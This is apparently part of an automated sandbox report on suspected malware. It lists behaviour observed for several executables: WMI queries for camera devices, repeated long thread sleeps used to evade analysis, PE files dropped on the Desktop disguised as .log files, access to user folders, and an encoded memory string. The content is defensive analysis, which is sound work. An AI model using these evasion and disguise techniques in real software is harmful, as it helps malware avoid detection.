Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Source: C:\winRefruntime\MsAgentDriverruntime.exe	Memory allocated: 1100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Memory allocated: 1AD90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Memory allocated: 9C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Memory allocated: 1A770000 memory reserve \| memory write watch	Jump to behavior

Source: C:\winRefruntime\MsAgentDriverruntime.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 599250	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 599139	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 599021	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 598532	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 596766	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 596438	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 596313	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 595313	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 595202	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 594982	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 594766	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 594641	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 594516	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 594406	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 594297	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 594182	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 594078	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 593969	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 593860	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Window / User API: threadDelayed 2154			Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Window / User API: threadDelayed 7611			Jump to behavior

Source: C:\winRefruntime\MsAgentDriverruntime.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PinddLxP.log	Jump to dropped file
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\sbJHDJmG.log	Jump to dropped file
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\viSXCyGd.log	Jump to dropped file
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GWwNmKBL.log	Jump to dropped file
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cZPJNcWU.log	Jump to dropped file
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\nFKhSFqw.log	Jump to dropped file
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hnfQTxsY.log	Jump to dropped file
Source: C:\winRefruntime\MsAgentDriverruntime.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wJQffXMu.log	Jump to dropped file

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_0-23686

Source: C:\winRefruntime\MsAgentDriverruntime.exe TID: 7668	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 7952	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -599250s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -599139s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -599021s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -598891s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8056	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -598766s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -598640s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -598532s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -598422s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -598297s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -598188s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -598063s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -597953s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8056	Thread sleep time: -3600000s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -597844s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -596875s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -596766s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -596656s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -596547s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -596438s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -596313s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -596188s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -596078s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -595969s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -595859s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -595750s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -595641s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -595531s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -595422s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -595313s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -595202s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -595094s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -594982s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -594875s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -594766s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -594641s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -594516s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -594406s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -594297s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -594182s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -594078s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -593969s >= -30000s	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe TID: 8072	Thread sleep time: -593860s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\winRefruntime\MsAgentDriverruntime.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_0034A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		0_2_0034A69B
Source: C:\Users\user\Desktop\0V2JsCrGUB.exe	Code function: 0_2_0035C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		0_2_0035C220

Source: C:\Users\user\Desktop\0V2JsCrGUB.exe

Code function: 0_2_0035E6A3 VirtualQuery,GetSystemInfo,

0_2_0035E6A3

Source: C:\winRefruntime\MsAgentDriverruntime.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 599250	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 599139	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 599021	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 598532	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 596766	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 596438	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 596313	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 595313	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 595202	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 594982	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 594766	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 594641	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 594516	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 594406	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 594297	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 594182	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 594078	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 593969	Jump to behavior
Source: C:\Recovery\WBnjVTGHzbhirvM.exe	Thread delayed: delay time: 593860	Jump to behavior

Source: C:\winRefruntime\MsAgentDriverruntime.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\winRefruntime\MsAgentDriverruntime.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: WBnjVTGHzbhirvM.exe, 0000000B.00000002.2919516072.0000000012A29000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgV